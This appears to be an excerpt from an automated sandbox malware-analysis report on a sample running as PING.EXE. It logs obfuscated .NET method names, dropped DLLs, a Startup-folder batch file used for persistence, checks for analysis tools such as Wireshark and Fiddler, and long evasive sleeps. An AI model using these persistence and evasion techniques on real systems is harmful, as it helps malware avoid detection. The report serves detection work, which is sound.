              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, dSjLwOOBq5S8xcIDmvy.cs High entropy of concatenated method names: 'CULufKTteJhl0RuNSew', 'oQVjUkTghxn2qQENTbW', 'Dispose', 'ToString', 'DXcMKrT6ieWNGruyEyf', 'jOEugUTStIEMcl8gjMd', 'QpGiTQhrZpHBs0vbm5Q', 'ssBPNmh8GL8a08qPsUB', 'SFcQmw7yx2', 'gl1QXQWNFG'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, cOa8qNtY5ahAXGWQgN.cs High entropy of concatenated method names: 'mxADtipSP', 'eS364pa0w', 'LJ9Sp5Wfx', 'me6ahOsMX', 'pV9FcqTsZ', 'C5KqE8v3J', 'q1eiJDFX0', 'uZ0Onrt3u2', 'oQATxfFEE', 'yqoVgFGZX'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, uC0hRMPfPBtRWtAg1mn.cs High entropy of concatenated method names: 'bXlPP3Ncc7', 'TYjP7Ktb1S', 'yu2PNpEHJA', 'oVMPjQKEyI', 'DE0PGQ9Xi0', 'RZdPLFYhvs', 'qx9PRtiFVD', 't6hPmRQrOD', 'wyNPXVSrKq', 'aPWPue8diN'
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\zozwmnym.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.dll

              Boot Survival

              Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkkijTOJSHGJxxcmgeA.bat
              Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXE | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXE Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MOBIRISE4\MOBIRISE.EXE11976
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\FIDDLER2\FIDDLER.EXE11126
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004E21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE11179
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X86\WINDBG.EXE12392
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE11328
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE8327
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5321
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4484
              Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 740
              Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 733
              Source: C:\Windows\SysWOW64\PING.EXE Window / User API: threadDelayed 4999
              Source: C:\Windows\SysWOW64\PING.EXE Window / User API: threadDelayed 4520
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 543
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5326
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3148
              Source: C:\Windows\SysWOW64\PING.EXE Window / User API: threadDelayed 4598
              Source: C:\Windows\SysWOW64\PING.EXE Window / User API: threadDelayed 5141
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\zozwmnym.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1060 Thread sleep time: -9223372036854770s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -23980767295822402s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -33000s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -32875s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -32759s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -32648s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -32532s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -32419s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -32308s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -32193s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -31954s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -31736s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -31620s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -39000s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -38874s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -38765s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -38650s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -38531s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -38421s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -38310s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -38203s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -38093s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -37984s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -37865s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -37734s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -37625s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -37515s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -37406s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -37292s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -37171s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -37053s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -36927s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -36796s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -36687s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -36574s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -36466s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -36353s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -36247s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -36125s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -36015s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -35902s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -35781s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -35671s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -35553s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -35420s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -35279s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -35125s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -34980s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -34871s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -34750s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -34599s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -34470s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -34347s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -34218s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -34069s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612 Thread sleep time: -33940s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544 Thread sleep count: 5326 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540 Thread sleep count: 3148 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608 Thread sleep time: -24903104499507879s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -21213755684765971s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -35000s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -34891s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -69532s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -34654s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -34532s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -34422s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -34310s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -34197s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -34079s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -33967s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -33844s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -33734s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -33623s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -33500s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -33313s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -37000s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -36890s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -36769s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -36641s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -36531s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -36422s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -36312s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -36203s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -36083s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -35953s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -35844s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -35734s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -35625s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -35508s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -35375s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -35233s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -35124s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -35015s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -34655s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -34545s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -34437s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -34328s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -34218s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -34109s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160 Thread sleep time: -33994s >= -30000s
              Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\SysWOW64\PING.EXE WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
